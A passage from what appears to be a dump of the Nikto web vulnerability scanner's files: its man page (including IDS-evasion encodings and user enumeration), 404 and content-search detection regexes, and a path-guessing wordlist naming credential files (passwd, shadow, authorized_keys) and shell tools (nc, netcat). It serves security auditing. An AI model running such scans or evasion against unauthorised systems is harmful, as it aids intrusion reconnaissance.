    "content": ".\\\"     Title: nikto\n.\\\"    Author: \n.\\\" Generator: DocBook XSL Stylesheets v1.73.2 <http://docbook.sf.net/>\n.\\\"      Date: 02/03/2010\n.\\\"    Manual: Vulnerability Scanner\n.\\\"    Source: http://cirt.net/ 2.1.1\n.\\\"\n.TH \"NIKTO\" \"1\" \"02/03/2010\" \"http://cirt\\&.net/ 2\\&.1\" \"Vulnerability Scanner\"\n.\\\" disable hyphenation\n.nh\n.\\\" disable justification (adjust text to left margin only)\n.ad l\n.SH \"NAME\"\nnikto \\- Scan web server for known vulnerabilities\n.SH \"SYNOPSIS\"\n.HP 21\n\\fBnikto\\fR [options...]\n.SH \"DESCRIPTION\"\n.PP\nExamine a web server to find potential problems and security vulnerabilities, including:\n.sp\n.RS 4\n\\h'-04'\\(bu\\h'+03'Server and software misconfigurations\n.RE\n.sp\n.RS 4\n\\h'-04'\\(bu\\h'+03'Default files and programs\n.RE\n.sp\n.RS 4\n\\h'-04'\\(bu\\h'+03'Insecure files and programs\n.RE\n.sp\n.RS 4\n\\h'-04'\\(bu\\h'+03'Outdated servers and programs\n.RE\n.PP\nNikto is built on LibWhisker (by RFP) and can run on any platform which has a Perl environment\\&. It supports SSL, proxies, host authentication, attack encoding and more\\&. It can be updated automatically from the command\\-line, and supports the optional submission of updated version data back to the maintainers\\&.\n.SH \"OPTIONS\"\n.PP\nBelow are all of the Nikto command line options and explanations\\&. A brief version of this text is available by running Nikto with the \\-H (\\-Help) option\\&.\n.PP\n\\fB\\-Cgidirs\\fR\n.RS 4\nScan these CGI directories\\&. Special words \"none\" or \"all\" may be used to scan all CGI directories or none, (respectively)\\&. A literal value for a CGI directory such as \"/cgi\\-test/\" may be specified (must include trailing slash)\\&. If this is option is not specified, all CGI directories listed in nikto\\&.conf will be tested\\&.\n.RE\n.PP\n\\fB\\-config\\fR\n.RS 4\nSpecify an alternative config file to use instead of the nikto\\&.conf located in the install directory\\&.\n.RE\n.PP\n\\fB\\-dbcheck\\fR\n.RS 4\nCheck the scan databases for syntax errors\\&.\n.RE\n.PP\n\\fB\\-Display\\fR\n.RS 4\nControl the output that Nikto shows\\&. See Chapter 5 for detailed information on these options\\&. Use the reference number or letter to specify the type, multiple may be used:\n.sp\n1 \\- Show redirects\n.sp\n2 \\- Show cookies received\n.sp\n3 \\- Show all 200/OK responses\n.sp\n4 \\- Show URLs which require authentication\n.sp\nD \\- Debug Output\n.sp\nV \\- Verbose Output\n.RE\n.PP\n\\fB\\-evasion\\fR\n.RS 4\nSpecify the LibWhisker encoding technique to use (see the LibWhisker docs for detailed information on these)\\&. Use the reference number to specify the type, multiple may be used:\n.sp\n1 \\- Random URI encoding (non\\-UTF8)\n.sp\n2 \\- Directory self\\-reference (/\\&./)\n.sp\n3 \\- Premature URL ending\n.sp\n4 \\- Prepend long random string\n.sp\n5 \\- Fake parameter\n.sp\n6 \\- TAB as request spacer\n.sp\n7 \\- Change the case of the URL\n.sp\n8 \\- Use Windows directory separator (\\e)\n.sp\nA \\- Use a carriage return (0x0d) as a request spacer\n.sp\nB \\- Use binary value 0x0b as a request spacer\n.RE\n.PP\n\\fB\\-findonly\\fR\n.RS 4\nOnly discover the HTTP(S) ports, do not perform a security scan\\&. This will attempt to connect with HTTP or HTTPS, and report the Server header\\&.\n.RE\n.PP\n\\fB\\-Format\\fR\n.RS 4\nSave the output file specified with \\-o (\\-output) option in this format\\&. If not specified, the default will be taken from the file extension specified in the \\-output option\\&. Valid formats are:\n.sp\ncsv \\- a comma\\-seperated list\n.sp\nhtm \\- an HTML report\n.sp\ntxt \\- a text report\n.sp\nxml \\- an XML report\n.RE\n.PP\n\\fB\\-host\\fR\n.RS 4\nHost(s) to target\\&. Can be an IP address, hostname or text file of hosts\\&. A single dash (\\-) maybe used for stdout\\&. Can also parse nmap \\-oG style output\n.RE\n.PP\n\\fB\\-Help\\fR\n.RS 4\nDisplay extended help information\\&.\n.RE\n.PP\n\\fB\\-id\\fR\n.RS 4\nID and password to use for host Basic host authentication\\&. Format is \"id:password\"\\&.\n.RE\n.PP\n\\fB\\-list\\-plugins\\fR\n.RS 4\nWill list all plugins that Nikto can run against targets and then will exit without performing a scan\\&. These can be tuned for a session using the \\-plugins option\\&.\n.sp\nThe output format is:\n.sp\nPlugin\n\\fIname\\fR\n.sp\n\\ \\&\\fIfull name\\fR\n\\-\n\\fIdescription\\fR\n.sp\n\\ \\&Written by\n\\fIauthor\\fR, Copyright (C)\n\\fIcopyright\\fR\n.RE\n.PP\n\\fB\\-mutate\\fR\n.RS 4\nSpecify mutation technique\\&. A mutation will cause Nikto to combine tests or attempt to guess values\\&. These techniques may cause a tremendous amount of tests to be launched against the target\\&. Use the reference number to specify the type, multiple may be used:\n.sp\n1 \\- Test all files with all root directories\n.sp\n2 \\- Guess for password file names\n.sp\n3 \\- Enumerate user names via Apache (/~user type requests)\n.sp\n4 \\- Enumerate user names via cgiwrap (/cgi\\-bin/cgiwrap/~user type requests)\n.sp\n5 \\- Attempt to brute force sub\\-domain names, assume that the host name is the parent domain\n.sp\n6 \\- Attempt to guess directory names from the supplied dictionary file\n.RE\n.PP\n\\fB\\-mutate\\-options\\fR\n.RS 4\nProvide extra information for mutates, e\\&.g\\&. a dictionary file\n.RE\n.PP\n\\fB\\-nointeractive\\fR\n.RS 4\nDisable interactive features\\&.\n.RE\n.PP\n\\fB\\-nolookup\\fR\n.RS 4\nDo not perform name lookups on IP addresses\\&.\n.RE\n.PP\n\\fB\\-nossl\\fR\n.RS 4\nDo not use SSL to connect to the server\\&.\n.RE\n.PP\n\\fB\\-no404\\fR\n.RS 4\nDisable 404 (file not found) checking\\&. This will reduce the total number of requests made to the webserver and may be preferable when checking a server over a slow link, or an embedded device\\&. This will generally lead to more false positives being discovered\\&.\n.RE\n.PP\n\\fB\\-output\\fR\n.RS 4\nWrite output to the file specified\\&. The format used will be taken from the file extension\\&. This can be over\\-riden by using the \\-Format option (e\\&.g\\&. to write text files with a different extension\\&. Existing files will have new information appended\\&.\n.RE\n.PP\n\\fB\\-plugins\\fR\n.RS 4\nSelect which plugins will be run on the specified targets\\&. A comma separated list should be provided which lists the names of the plugins\\&. The names can be found by using \\-list\\-plugins\\&.\n.sp\nThere are two special entries: ALL, which specifies all plugins shall be run and NONE, which specifies no plugins shall be run\\&. The default is ALL\n.RE\n.PP\n\\fB\\-port\\fR\n.RS 4\nTCP port(s) to target\\&. To test more than one port on the same host, specify the list of ports in the \\-p (\\-port) option\\&. Ports can be specified as a range (i\\&.e\\&., 80\\-90), or as a comma\\-delimited list, (i\\&.e\\&., 80,88,90)\\&. If not specified, port 80 is used\\&.\n.RE\n.PP\n\\fB\\-Pause\\fR\n.RS 4\nSeconds (integer or floating point) to delay between each test\\&.\n.RE\n.PP\n\\fB\\-root\\fR\n.RS 4\nPrepend the value specified to the beginning of every request\\&. This is useful to test applications or web servers which have all of their files under a certain directory\\&.\n.RE\n.PP\n\\fB\\-ssl\\fR\n.RS 4\nOnly test SSL on the ports specified\\&. Using this option will dramatically speed up requests to HTTPS ports, since otherwise the HTTP request will have to timeout first\\&.\n.RE\n.PP\n\\fB\\-Single\\fR\n.RS 4\nPerform a single request to a target server\\&. Nikto will prompt for all options which can be specified, and then report the detailed output\\&. See Chapter 5 for detailed information\\&.\n.RE\n.PP\n\\fB\\-timeout\\fR\n.RS 4\nSeconds to wait before timing out a request\\&. Default timeout is 10 seconds\\&.\n.RE\n.PP\n\\fB\\-Tuning\\fR\n.RS 4\nTuning options will control the test that Nikto will use against a target\\&. By default, if any options are specified, only those tests will be performed\\&. If the \"x\" option is used, it will reverse the logic and exclude only those tests\\&. Use the reference number or letter to specify the type, multiple may be used:\n.sp\n0 \\- File Upload\n.sp\n1 \\- Interesting File / Seen in logs\n.sp\n2 \\- Misconfiguration / Default File\n.sp\n3 \\- Information Disclosure\n.sp\n4 \\- Injection (XSS/Script/HTML)\n.sp\n5 \\- Remote File Retrieval \\- Inside Web Root\n.sp\n6 \\- Denial of Service\n.sp\n7 \\- Remote File Retrieval \\- Server Wide\n.sp\n8 \\- Command Execution / Remote Shell\n.sp\n9 \\- SQL Injection\n.sp\na \\- Authentication Bypass\n.sp\nb \\- Software Identification\n.sp\nc \\- Remote Source Inclusion\n.sp\nx \\- Reverse Tuning Options (i\\&.e\\&., include all except specified)\n.sp\nThe given string will be parsed from left to right, any x characters will apply to all characters to the right of the character\\&.\n.RE\n.PP\n\\fB\\-useproxy\\fR\n.RS 4\nUse the HTTP proxy defined in the configuration file, or given as argument in the format http://server:port\\&.\n.RE\n.PP\n\\fB\\-update\\fR\n.RS 4\nUpdate the plugins and databases directly from cirt\\&.net\\&.\n.RE\n.PP\n\\fB\\-Version\\fR\n.RS 4\nDisplay the Nikto software, plugin and database versions\\&.\n.RE\n.PP\n\\fB\\-vhost\\fR\n.RS 4\nSpecify the Host header to be sent to the target\\&.\n.RE\n.SH \"FILES\"\n.PP\n\\fInikto\\&.conf\\fR\n.RS 4\nThe Nikto configuration file\\&. This sets Nikto\\'s global options\\&. Several nikto\\&.conf files may exist and are parsed in the below order\\&. As each configuration file is loaded is supersedes any previously set configuration:\n.sp\n.RS 4\n\\h'-04'\\(bu\\h'+03'System wide (e\\&.g\\&. /etc/nikto\\&.conf)\n.RE\n.sp\n.RS 4\n\\h'-04'\\(bu\\h'+03'Home directory (e\\&.g\\&. $HOME/nikto\\&.conf)\n.RE\n.sp\n.RS 4\n\\h'-04'\\(bu\\h'+03'Current directory (e\\&.g\\&. \\&./nikto\\&.conf)\n.RE\n.RE\n.PP\n\\fI${NIKTO_DIR}/plugins/db*\\fR\n.RS 4\ndb files are the databases that nikto uses to check for vulnerabilities and issues within the web server\\&.\n.RE\n.PP\n\\fI${NIKTO_DIR}/plugins/*\\&.plugin\\fR\n.RS 4\nAll nikto\\'s plugins exist here\\&. Nikto itself is just a wrapper script to manage CLI and pass through to the plugins\\&.\n.RE\n.PP\n\\fI${NIKTO_DIR}/templates\\fR\n.RS 4\nContains the templates for nikto\\'s output formats\\&.\n.RE\n.SH \"BUGS\"\n.PP\nThe current features are not supported:\n.sp\n.RS 4\n\\h'-04'\\(bu\\h'+03'SOCKS Proxies\n.RE\n.SH \"AUTHORS\"\n.PP\nNikto is written and maintained by Chris Sullo and David Lodge\\&. See the main documentation for other contributors\\&.\n.PP\nAll code is Copyright CIRT, Inc., except LibWhisker which is Copyright (c) 2009, Jeff Forristal (wiretrip.net)\\&.  Other portions of code may be (C) as specified\\&.\n.SH \"SEE ALSO\"\n.PP\n\n\\fINikto Homepage\\fR\\&[1]\n.SH \"NOTES\"\n.IP \" 1.\" 4\nNikto Homepage\n.RS 4\n\\%http://cirt.net/\n.RE\n"
  },
  {
    "path": "nikto/program/databases/db_404_strings",
    "content": "#VERSION,2.003\n#######################################################################\n# File Source: https://cirt.net\n# (c) 2001 Chris Sullo, All Rights Reserved.\n# This file may only be distributed and used with the full Nikto package.\n# This file may not be used with any software product without written permission from \n# Chris Sullo (csullo@gmail.com)\n#\n# Note:\n# By submitting updates to this file you are transferring any and all copyright\n# interest in the data to Chris Sullo so it can modified, incorporated into this product\n# relicensed or reused.\n#######################################################################\n# Notes:\n# Strings to be used for 404 content match\n#######################################################################\nAccess Failed\nan error\nBad Request\nClient Authentication Remote Service\ncould not find\nerror has occurred\nError 404\nError Occurred While Processing Request\nError processing SSI file\nExtendNet DX Configuration\nFireWall-1 message\nforcelogon.htm\nIMail Server Web Messaging\nManagement Console\nname=qt id=\"search\" size=40 value=\" \"\nNo web site is configured at this address\nnot found\nparameter is incorrect                                   # IIS 5.0 500 error\nPlease identify yourself:\nReload acp_userinfo database\nRSA SecurID User Name Request\nThe userid or password that was specified is not valid.  # Tivoli server administrator\nTYPE=password\t                                         # As in \"<input type=password>\"\nUnable to complete your request\nunable to open\nWeb access denied\nHack Attempts\ndoes not exist                                           # SAP NetWeaver\n<b>Wrong URL.                                            # Cisco SSL VPN\npage may no longer exist\npage no longer exist\nYour session has expired\t\t\t\t# cPanel webmail\nno longer available\nRequest Rejected\nMore about this error\t\t\t\t\t# MS Lync 2010\nNo target SAP system for request\t\t\t# SAP web server\nno valid destination server available for\t\t# SAP web server\nunauthorized public IP address\t\t\t\t# BigIP\n<TITLE>Invalid URL</TITLE>                              # AkamaiGhost\n"
  },
  {
    "path": "nikto/program/databases/db_content_search",
    "content": "#VERSION,2.000\n#######################################################################\n# File Source: https://cirt.net\n# (c) 2001 Chris Sullo, All Rights Reserved.\n# This file may only be distributed and used with the full Nikto package.\n# This file may not be used with any software product without written permission from\n# Chris Sullo (csullo@gmail.com)\n#\n# Note:\n# By submitting updates to this file you are transferring any and all copyright\n# interest in the data to Chris Sullo so it can modified, incorporated into this product\n# relicensed or reused.\n#######################################################################\n# Notes:\n# These can be regular expressions, but will be eval'd case insensitive.\n# Since these are run after every page retrieved, we should try to keep these as fast\n# regular expressions as possible, and limited to only critical findings.\n#######################################################################\n\"nikto_id\",\"osvdb\",\"matchstring\",\"message\"\n\"750500\",\"3268\",\"[iI]ndex [oO]f \\/\",\"Directory indexing found.\"\n\"750501\",\"0\",\"Warning(?:<\\/b>)?:\\s+(?:include|require)(?:_once)?\\(\",\"PHP include error may indicate local or remote file inclusion is possible.\"\n\"750502\",\"0\",\"failed to open stream: No such file or directory in (?:<b>)?(?:[a-zA-Z]:\\\\|\\/)\",\"PHP include error reveals the full path to the web root.\"\n\"750503\",\"0\",\"mysql_p?connect\\(\",\"Potential PHP MySQL database connection string found.\"\n\"750504\",\"0\",\"pgp_p?connect\\(\",\"Potential PHP PostgreSQL database connection string found.\"\n\"750505\",\"0\",\"sqlite_p?open\\(\",\"Potential PHP SQLite database connection string found.\"\n\"750506\",\"0\",\"mssql_p?connect\\(\",\"Potential PHP MSSQL database connection string found.\"\n\"750507\",\"0\",\"Call to undefined function.*\\(\\) in \\/\",\"PHP error reveals file system path.\"\n\"750508\",\"36099\",\"FrameworkLog.xsl\\\"\\\\?>.*<version>(?:[0-2]|3\\.(?:[0-5]|6\\.0\\.(?:[0-4]|5(?:[0-3]|4[0-5]))))\",\"McAfee Common Management Agent 3.6.0.546 and below contain multiple overflows.\"\n\"750509\",\"0\",\"However, we found documents with names similar to the one you requested\",\"The mod_speling module can reveal otherwise 'hidden' files in directories.\"\n\"750510\",\"0\",\"makes use of the Zend Scripting Language\",\"Output from the phpinfo() function was found.\"\n\"750511\",\"0\",\"SQLSTATE\\[\",\"A database error may reveal internal details about the running database.\"\n\"750512\",\"0\",\"jetty-dir.css\\\" REL=\\\"stylesheet\\\" TYPE=\\\"text/css\\\"\\/><TITLE>Directory: \\/\",\"Directory indexing found (Jetty).\"\n\"750513\",\"0\",\"404-server!!\",\"This string is associated with the 'meuhy.php' backdoor file uploader/downloader.\"\n\"750514\",\"0\",\"Brazilians Defacers\",\"This string is associated with pages tagged by HackerBrasilll group.\"\n\"750515\",\"0\",\"HackerBrasilll\",\"This string is associated with pages tagged by HackerBrasilll group.\"\n\"750516\",\"0\",\"plain HTTP to an SSL\",\"You appear to be scanning an HTTPS site with HTTP. This won't work as you expect..\"\n\"750517\",\"0\",\"plain HTTP request was sent to HTTPS\",\"You appear to be scanning an HTTPS site with HTTP. This won't work as you expect.\"\n\"750518\",\"0\",\"password e-?mailed\",\"Possible cleartext emailing of stored password.\"\n\"750519\",\"0\",\"[T]omcat\\s[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\",\"The detailed Tomcat version is disclosed in error pages.\"\n"
  },
  {
    "path": "nikto/program/databases/db_dictionary",
    "content": "#VERSION,1.0\n#######################################################################\n# File Source: https://cirt.net\n# (c) 2001 Chris Sullo, All Rights Reserved.\n# This file may only be distributed and used with the full Nikto package.\n# This file may not be used with any software product without written permission from\n# Chris Sullo (csullo@gmail.com)\n#\n# Note:\n# By submitting updates to this file you are transferring any and all copyright\n# interest in the data to Chris Sullo so it can modified, incorporated into this product\n# relicensed or reused.\n#######################################################################\n# Notes:\n#######################################################################\nADM\nADMIN\nAggreSpy\nAppsLocalLogin\nAppsLogin\nBUILD\nCMS\nCVS\nDB\nDMSDump\nDocuments\nEntries\nFCKeditor\nJMXSoapAdapter\nLICENSE\nMANIFEST.MF\nMETA-INF\nMakefile\nOA\nOAErrorDetailPage\nOA_HTML\nProgram\nREADME\nReadme\nRecycled\nRoot\nSQL\nSUNWmc\nSiteScope\nSiteServer\nSpy\nTEMP\nTMP\nTODO\nThumbs.db\nWEB-INF\nWS_FTP\nXXX\n_\n_adm\n_admin\n_common\n_conf\n_files\n_include\n_js\n_mem_bin\n_old\n_pages\n_private\n_res\n_source\n_src\n_test\n_vti_bin\n_vti_cnf\n_vti_pvt\n_vti_txt\n_www\na\naa\naaa\nabc\nabc123\nabcd\nabcd1234\nabout\naccess\naccess-log\naccess-log.1\naccess.1\naccess_log\naccess_log.1\naccessibility\naccount\naccounting\naccounts\naction\nactions\nactive\nactivex\nad\nadclick\nadd\naddpost\naddressbook\nadm\nadmin\nadmin_\nadodb\nads\nadv\nadvanced\nadvertise\nadvertising\naffiliate\naffiliates\nagenda\nagent\nagents\najax\nalbum\nalbums\nalert\nalerts\nalias\naliases\nall\nalpha\nalumni\namazon\nanalog\nandroid\nannouncement\nannouncements\nanon\nanonymous\nansi\napac\napache\napexec\napi\napis\napp\nappeal\nappeals\nappend\nappl\napple\nappliation\napplications\napps\napr\narch\narchive\narchives\narray\nart\narticle\narticles\nartwork\nascii\nasdf\nasset\nassets\natlassian\natom\nattach\nattachment\nattachments\nattachs\nattic\nauction\naudio\naudit\naudits\nauth\nauthor\nauthorized_keys\nauthors\nauto\nautomatic\nautomation\navatar\navatars\naward\nawards\nawl\nawstats\nb\nb2b\nb2c\nback\nbackdoor\nbackend\nbackup\nbackups\nbandwidth\nbank\nbanks\nbanner\nbanners\nbar\nbase\nbash\nbasic\nbasket\nbaskets\nbatch\nbaz\nbb\nbb-hist\nbb-histlog\nbboard\nbbs\nbeans\nbeehive\nbenefits\nbeta\nbfc\nbig\nbigip\nbill\nbilling\nbinaries\nbinary\nbins\nbio\nbios\nbiz\nbkup\nblah\nblank\nblog\nblogger\nbloggers\nblogs\nboard\nbofh\nbook\nbooks\nboot\nbottom\nbroken\nbroker\nbrowse\nbrowser\nbs\nbsd\nbugs\nbuild\nbuildr\nbulk\nbullet\nbusiness\nbutton\nbuttons\nbuy\nbuynow\nbypass\nca\ncache\ncal\ncalendar\ncamel\ncar\ncard\ncards\ncareer\ncareers\ncars\ncart\ncarts\ncat\ncatalog\ncatalogs\ncatalyst\ncategories\ncategory\ncatinfo\ncats\nccbill\ncd\ncerificate\ncert\ncertificate\ncertificates\ncerts\ncf\ncfcache\ncfdocs\ncfide\ncfusion\ncgi-bin\ncgi-bin2\ncgi-home\ncgi-local\ncgi-pub\ncgi-script\ncgi-shl\ncgi-sys\ncgi-web\ncgi-win\ncgibin\ncgiwrap\ncgm-web\nchange\nchanged\nchanges\ncharge\ncharges\nchat\nchats\ncheckout\nchild\nchildren\nchrome\ncisco\ncisweb\ncitrix\ncl\nclaim\nclaims\nclasses\nclassified\nclassifieds\nclear\nclick\nclicks\nclient\nclientaccesspolicy\nclients\nclose\nclosed\nclosing\nclub\ncluster\nclusters\ncmd\ncms\ncnf\ncnt\ncocoon\ncode\ncodec\ncodecs\ncodes\ncognos\ncoldfusion\ncolumns\ncom\ncomment\ncomments\ncommerce\ncommercial\ncommon\ncommunicator\ncommunity\ncompact\ncompany\ncomplaint\ncomplaints\ncompliance\ncomponent\ncomponents\ncompressed\ncomputer\ncomputers\ncomputing\nconference\nconferences\nconfigs\nconsole\nconsumer\ncontact\ncontacts\ncontent\ncontents\ncontest\ncontract\ncontracts\ncontrol\ncontroller\ncontrolpanel\ncookie\ncookies\ncopies\ncopy\ncopyright\ncore\ncorp\ncorpo\ncorporate\ncorrections\ncount\ncounter\ncounters\ncounts\ncourse\ncourses\ncover\ncpadmin\ncpanel\ncr\ncrack\ncrash\ncrashes\ncreate\ncredits\ncrm\ncron\ncrons\ncrontab\ncrontabs\ncrossdomain\ncrypt\ncrypto\ncss\ncurrent\ncustom\ncustom-log\ncustom_log\ncustomer\ncustomers\ncute\ncv\ncxf\nczcmdcvt\nd\ndaemon\ndaily\ndana-na\ndata\ndatabase\ndatabases\ndate\nday\ndb_connect\ndba\ndbase\ndbman\ndbmodules\ndbutil\ndc\ndcforum\nde\ndealer\ndebug\ndecl\ndeclaration\ndeclarations\ndecode\ndecrypt\ndecrypted\ndecryption\ndef\ndefault\ndefaults\ndefinition\ndefinitions\ndel\ndelete\ndeleted\ndemo\ndemos\ndenied\ndeny\ndesign\ndesktop\ndesktops\ndetail\ndetails\ndev\ndevel\ndeveloper\ndevelopers\ndevelopment\ndevice\ndevices\ndevs\ndf\ndialog\ndialogs\ndiff\ndiffs\ndigest\ndigg\ndir\ndirectories\ndirectory\ndirs\ndisabled\ndisclaimer\ndisplay\ndjango\ndl\ndm\ndm-config\ndms\ndms0\ndns\ndocebo\ndock\ndocroot\ndocs\ndocument\ndocumentation\ndocuments\ndomain\ndomains\ndonate\ndown\ndownload\ndownloader\ndownloads\ndrop\ndropped\ndrupal\ndummy\ndumps\ndvd\ndwr\ndynamic\ne\ne2fs\near\necommerce\nedge\nedit\neditor\nedits\nedp\nedu\neducation\nee\neffort\nefforts\negress\nejb\nelement\nelements\nem\nemail\nemails\nembed\nembedded\nemea\nemployees\nemployment\nempty\nemu\nemulator\nen\nen_US\nenc\nencode\nencrypt\nencrypted\nencyption\neng\nengine\nenglish\nenterprise\nentertainment\nentries\nentry\nenv\nenviron\nenvironment\nerror\nerror-log\nerror_log\nerrors\nes\nesale\nesales\netc\neurope\nevent\nevents\nevil\nevt\news\nex\nexample\nexamples\nexcalibur\nexchange\nexec\nexplorer\nexport\next\next2\nextern\nexternal\nextras\nezshopper\nf\nface\nfaces\nfaculty\nfail\nfailure\nfamily\nfaq\nfaqs\nfavorite\nfavorites\nfcgi-bin\nfeature\nfeatures\nfeed\nfeedback\nfeeds\nfelix\nfetch\nfield\nfields\nfile\nfileadmin\nfiles\nfilez\nfinance\nfinancial\nfind\nfinger\nfirefox\nfirewall\nfirst\nfixed\nflags\nflash\nflow\nflows\nflv\nfn\nfolder\nfolders\nfont\nfonts\nfoo\nfooter\nfooters\nform\nformatting\nformmail\nforms\nforrest\nfortune\nforum\nforum1\nforum2\nforumdisplay\nforums\nforward\nfoto\nfoundation\nfr\nframe\nframes\nframework\nfree\nfreebsd\nfriend\nfriends\nfrob\nfrontend\nfs\nftp\nfuck\nfuckoff\nfuckyou\nfull\nfun\nfunc\nfuncs\nfunction\nfunctions\nfusion\nfw\ng\ngadget\ngadgets\ngalleries\ngallery\ngame\ngames\nganglia\ngarbage\ngateway\ngb\ngeeklog\ngeneral\ngeronimo\nget\ngetaccess\ngetjobid\ngfx\ngid\ngitweb\nglimpse\nglobal\nglobals\nglossary\ngo\ngoaway\ngoogle\ngovernment\ngprs\ngrant\ngrants\ngraphics\ngroup\ngroupcp\ngroups\ngsm\nguest\nguestbook\nguests\nguide\nguides\ngump\ngwt\nh\nhack\nhacker\nhacking\nhackme\nhadoop\nhardcore\nhardware\nharmony\nhead\nheader\nheaders\nhealth\nhello\nhelp\nhelper\nhelpers\nhi\nhidden\nhide\nhigh\nhipaa\nhistory\nhit\nhits\nhole\nhome\nhomepage\nhop\nhorde\nhosting\nhosts\nhour\nhourly\nhowto\nhp\nhr\nhta\nhtbin\nhtdoc\nhtdocs\nhtpasswd\nhttp\nhttpd\nhttps\nhttpuser\nhu\nhyper\ni\nia\nibm\nicat\nicon\nicons\nid\nidea\nideas\nids\nie\niframe\nig\nignore\niisadmin\niisadmpwd\niissamples\nimage\nimagefolio\nimages\nimgs\nimp\nimport\nimportant\nin\ninbound\nincl\ninclude\nincludes\nincoming\nincubator\nindex\nindex1\nindex2\nindex_1\nindex_2\ninetpub\ninetsrv\ninf\ninfo\ninformation\ningress\ninit\ninline\ninput\ninquire\ninquiries\ninquiry\ninsert\ninstall\nint\ninterim\nintermediate\ninternal\ninternational\ninternet\nintl\nintranet\nintro\nip\nipc\niphone\nips\nirc\nis\nisapi\niso\nissues\nit\nitem\nj\nj2ee\nj2me\njakarta\njava-plugin\njavadoc\njavascript\njavax\njboss\njdbc\njigsaw\njira\njj\njmx-console\njob\njobs\njoe\njohn\njoin\njoomla\njournal\njp\njpa\njre\njrun\njson\njsso\njsx\njuniper\njunk\njvm\nk\nkboard\nkeep\nkernel\nkeygen\nkeys\nkids\nkill\nknown_hosts\nl\nlabs\nlang\nlarge\nlaw\nlayout\nlayouts\nldap\nleader\nleaders\nleft\nlegacy\nlegal\nlenya\nletters\nlevel\nlg\nlibrary\nlibs\nlicense\nlicenses\nlimit\nline\nlink\nlinks\nlinux\nlist\nlistinfo\nlists\nlive\nlo\nloader\nloading\nloc\nlocal\nlocation\nlock\nlocked\nlog4j\nlogfile\nlogger\nlogging\nlogin\nlogins\nlogo\nlogoff\nlogon\nlogos\nlogout\nlogs\nlost\nlost+found\nlow\nls\nlucene\nm\nmac\nmail\nmailer\nmailing\nmailman\nmails\nmain\nmambo\nmanage\nmanagement\nmanager\nmanual\nmanuals\nmap\nmaps\nmark\nmarketing\nmaster\nmaster.passwd\nmatch\nmatrix\nmaven\nmbox\nme\nmedia\nmedium\nmem\nmember\nmembers\nmembership\nmemory\nmenu\nmessage\nmessages\nmessaging\nmicrosoft\nmigrate\nmigration\nmina\nmini\nminute\nmirror\nmirrors\nmisc\nmission\nmix\nmlist\nmms\nmobi\nmobile\nmock\nmod\nmodify\nmods\nmodule\nmodules\nmojo\nmoney\nmonitoring\nmonth\nmonthly\nmore\nmotd\nmove\nmovie\nmovies\nmp\nmp3\nmp3s\nms\nms-sql\nmsadc\nmsadm\nmsie\nmsql\nmssql\nmta\nmultimedia\nmusic\nmx\nmy\nmyadmin\nmyfaces\nmyphpnuke\nmysql\nmysqld\nn\nnav\nnavigation\nnc\nnet\nnetbsd\nnetcat\nnethome\nnets\nnetwork\nnetworking\nnew\nnews\nnewsletter\nnewsletters\nnewticket\nnext\nnfs\nnice\nnl\nnobody\nnode\nnone\nnote\nnotes\nnotification\nnotifications\nnotified\nnotifier\nnotify\nns\nnuke\nnul\nnull\noa_servlets\noauth\nobdc\nobsolete\nobsoleted\nodbc\node\noem\nofbiz\noffice\nonbound\nonline\nop\nopen\nopenbsd\nopendir\nopenejb\nopenjpa\nopera\noperations\nopinion\noprocmgr-status\nopt\noption\noptions\noracle\noracle.xml.xsql.XSQLServlet\norder\nordered\norders\norg\nosc\noscommerce\nother\noutgoing\noutline\noutput\noutreach\noverview\nowa\nows\nows-bin\np\np2p\npack\npackages\npage\npage1\npage2\npage_1\npage_2\npages\npaid\npanel\npaper\npapers\nparse\npartner\npartners\nparty\npass\npasswd\npassword\npasswords\npast\npatch\npatches\npayment\npayments\npaypal\npbo\npc\npci\npda\npdfs\npear\npeek\npending\npeople\nperf\nperformance\nperl\npersonal\npg\nphf\nphone\nphones\nphorum\nphoto\nphotos\nphpBB\nphpBB2\nphpEventCalendar\nphpMyAdmin\nphpbb\nphpmyadmin\nphpnuke\nphps\npic\npics\npictures\npii\nping\npipe\npipermail\npiranha\npivot\npix\npixel\npkg\npkgs\nplain\nplay\nplayer\nplaying\nplaylist\npls\nplugin\nplugins\npm\npoc\npoi\npolicies\npolicy\npolitics\npoll\npolls\npool\npop\npop3\npopup\nporn\nport\nportal\nportals\nportfolio\npos\npost\nposted\npostgres\npostgresql\npostnuke\npostpaid\nposts\npr\npr0n\npremium\nprepaid\npresentation\npresentations\npreserve\npress\npreview\npreviews\nprevious\npricing\nprint\nprintenv\nprinter\nprinters\npriv\nprivacy\nprivate\npro\nproblems\nproc\nprocedures\nprod\nproduct\nproduct_info\nproduction\nproducts\nprofile\nprofiles\nprofiling\nprogram\nprogramming\nprograms\nproject\nprojects\npromo\nprop\nproperties\nproperty\nprops\nprot\nprotect\nprotected\nprotection\nproto\nproxies\nproxy\nprv\nps\npsql\npt\npub\npublic\npublication\npublications\npubs\npull\npurchase\npurchases\npurchasing\npush\npw\npwd\npython\nq\nqotd\nqpid\nqueries\nquery\nqueue\nqueues\nquote\nquotes\nr\nradio\nrandom\nrdf\nread\nreadme\nrealestate\nreceive\nreceived\nrecharge\nrecord\nrecorded\nrecorder\nrecords\nrecovery\nrecycle\nrecycled\nredir\nredirect\nreference\nreg\nregister\nregistered\nregistration\nregistrations\nrelease\nreleases\nremind\nreminder\nremote\nremove\nremoved\nrender\nrendered\nrep\nrepl\nreplica\nreplicas\nreplicate\nreplicated\nreplication\nreplicator\nreply\nreport\nreporting\nreports\nreprints\nreq\nreqs\nrequest\nrequests\nrequisition\nrequisitions\nres\nresearch\nresin\nresize\nresource\nresources\nrest\nrestore\nrestored\nrestricted\nresults\nretail\nreverse\nreversed\nrevert\nreverted\nreview\nreviews\nright\nroam\nroaming\nrobot\nrobots\nroller\nroom\nroot\nrpc\nru\nrule\nrules\nrun\nrwservlet\ns\nsale\nsales\nsam\nsamba\nsaml\nsample\nsamples\nsav\nsaved\nsaves\nsbin\nscan\nscanned\nscans\nsched\nschedule\nscheduled\nscheduling\nschema\nscience\nscreen\nscreens\nscreenshot\nscreenshots\nscript\nscriptlet\nscriptlets\nscripts\nsdk\nse\nsearch\nsec\nsecond\nsecret\nsection\nsections\nsecure\nsecured\nsecurity\nseed\nselect\nsell\nsend\nsendmail\nsendto\nsent\nserial\nserv\nserve\nserver\nserver-info\nserver-status\nservers\nservice\nservices\nservlet\nservlets\nsession\nsessions\nsetting\nsettings\nsetup\nshadow\nshare\nshared\nshares\nshell\nship\nshipped\nshipping\nshop\nshopper\nshopping\nshops\nsh